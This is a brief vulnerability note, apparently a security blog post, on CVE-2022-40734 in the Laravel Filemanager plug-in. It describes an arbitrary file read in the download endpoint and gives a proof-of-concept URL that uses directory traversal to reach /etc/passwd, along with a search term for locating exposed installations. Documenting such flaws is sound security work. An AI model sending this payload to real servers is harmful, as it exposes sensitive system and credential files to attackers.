Laravel Filemanager Plug In Download Arbitrary File Reading Vulnerability Cve 2022 40734
Laravel Filemanager Plug In Download Arbitrary File Reading Vulnerability Cve 2022 40734
Laravel Filemanager plug-in download arbitrary file reading vulnerability CVE-2022-40734
Vulnerability Description
Laravel Filemanager plug-in download interface has arbitrary file reading vulnerability, and attackers can obtain sensitive data on the server through the vulnerability.
Vulnerability Impact
Laravel Filemanager plugin
Network surveying and mapping
“Laravel Filemanager”
Vulnerability reappears
Main page
Verify POC
1
/laravel-filemanager/download?working_dir=%2F../../../../../../../../../../../../../../../../../../../etc/passwd
This post is licensed under CC BY 4.0 by the author.